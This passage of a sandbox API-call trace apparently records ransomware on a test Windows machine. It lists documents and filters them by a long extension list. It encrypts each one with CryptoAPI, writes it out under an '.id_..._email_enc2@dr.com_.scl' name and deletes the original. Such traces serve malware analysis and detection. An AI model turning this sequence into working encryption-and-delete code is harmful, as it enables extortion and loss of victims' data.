	[0189.531] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.533] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 123
	[0189.533] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.535] WriteFile (in: hFile=0x390, lpBuffer=0xfdbd48*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdbd48*, lpNumberOfBytesWritten=0x18a648*=0x5e0, lpOverlapped=0x0) returned 1
	[0189.537] CloseHandle (hObject=0x390) returned 1
	[0189.538] CloseHandle (hObject=0x388) returned 1
	[0189.538] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt")) returned 1
	[0189.540] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\qcuqe.ppt")) returned 0
	[0189.540] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6c0170, ftCreationTime.dwHighDateTime=0x1d9755f, ftLastAccessTime.dwLowDateTime=0x65ff62b0, ftLastAccessTime.dwHighDateTime=0x1d9764f, ftLastWriteTime.dwLowDateTime=0x65ff62b0, ftLastWriteTime.dwHighDateTime=0x1d9764f, nFileSizeHigh=0x0, nFileSizeLow=0x3e5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="tPlLu6Cyj8zpvvCtBr 8.rtf", cAlternateFileName="TPLLU6~1.RTF")) returned 1
	[0189.541] lstrcmpW (lpString1="tPlLu6Cyj8zpvvCtBr 8.rtf", lpString2="..") returned 1
	[0189.541] lstrcmpW (lpString1="tPlLu6Cyj8zpvvCtBr 8.rtf", lpString2=".") returned 1
	[0189.541] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.541] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="tPlLu6Cyj8zpvvCtBr 8.rtf" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\tPlLu6Cyj8zpvvCtBr 8.rtf") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\tPlLu6Cyj8zpvvCtBr 8.rtf"
	[0189.541] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\tPlLu6Cyj8zpvvCtBr 8.rtf") returned 96
	[0189.541] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.541] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\tPlLu6Cyj8zpvvCtBr 8.rtf", cchLength=0x60 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf") returned 0x60
	[0189.541] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.542] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.542] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf"
	[0189.542] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf") returned 96
	[0189.542] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.542] StrStrW (lpFirst=".rtf", lpSrch=".") returned=".rtf"
	[0189.542] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.543] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".rtf") returned=".rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.543] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.543] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.543] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.546] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x3e5d, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x3e5d, lpOverlapped=0x0) returned 1
	[0189.548] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.548] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcaf78) returned 1
	[0189.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.551] CryptCreateHash (in: hProv=0xfcaf78, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0189.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.551] CryptHashData (hHash=0xfb9570, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0189.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.552] CryptDeriveKey (in: hProv=0xfcaf78, Algid=0x6610, hBaseData=0xfb9570, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb8ef0) returned 1
	[0189.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.552] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x3e5d, dwBufLen=0x3e5d | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x3e60) returned 1
	[0189.552] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.553] RtlMoveMemory (in: Destination=0xfe0fe8, Source=0xfdd180, Length=0x3e5d | out: Destination=0xfe0fe8) 
	[0189.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.553] CryptEncrypt (in: hKey=0xfb8ef0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe0fe8*, pdwDataLen=0x18a1ec*=0x3e5d, dwBufLen=0x3e60 | out: pbData=0xfe0fe8*, pdwDataLen=0x18a1ec*=0x3e60) returned 1
	[0189.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.553] CryptDestroyKey (hKey=0xfb8ef0) returned 1
	[0189.553] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.553] CryptDestroyHash (hHash=0xfb9570) returned 1
	[0189.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.554] CryptReleaseContext (hProv=0xfcaf78, dwFlags=0x0) returned 1
	[0189.554] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.554] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.554] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.555] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.556] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 138
	[0189.556] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.556] WriteFile (in: hFile=0x390, lpBuffer=0xfe0fe8*, nNumberOfBytesToWrite=0x3e60, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe0fe8*, lpNumberOfBytesWritten=0x18a648*=0x3e60, lpOverlapped=0x0) returned 1
	[0189.559] CloseHandle (hObject=0x390) returned 1
	[0189.559] CloseHandle (hObject=0x388) returned 1
	[0189.559] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf")) returned 1
	[0189.564] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\tpllu6cyj8zpvvctbr 8.rtf")) returned 0
	[0189.564] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a2c6740, ftCreationTime.dwHighDateTime=0x1d96bec, ftLastAccessTime.dwLowDateTime=0x57d2440, ftLastAccessTime.dwHighDateTime=0x1d96e1b, ftLastWriteTime.dwLowDateTime=0x57d2440, ftLastWriteTime.dwHighDateTime=0x1d96e1b, nFileSizeHigh=0x0, nFileSizeLow=0xa202, dwReserved0=0x0, dwReserved1=0x0, cFileName="wcvbxKnnMpvB-Skuig.xls", cAlternateFileName="WCVBXK~1.XLS")) returned 1
	[0189.564] lstrcmpW (lpString1="wcvbxKnnMpvB-Skuig.xls", lpString2="..") returned 1
	[0189.564] lstrcmpW (lpString1="wcvbxKnnMpvB-Skuig.xls", lpString2=".") returned 1
	[0189.564] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.564] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="wcvbxKnnMpvB-Skuig.xls" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\wcvbxKnnMpvB-Skuig.xls") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\wcvbxKnnMpvB-Skuig.xls"
	[0189.571] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\wcvbxKnnMpvB-Skuig.xls") returned 94
	[0189.571] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.571] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\wcvbxKnnMpvB-Skuig.xls", cchLength=0x5e | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls") returned 0x5e
	[0189.571] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.571] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.571] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls"
	[0189.571] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\wcvbxknnmpvb-skuig.xls") returned 94
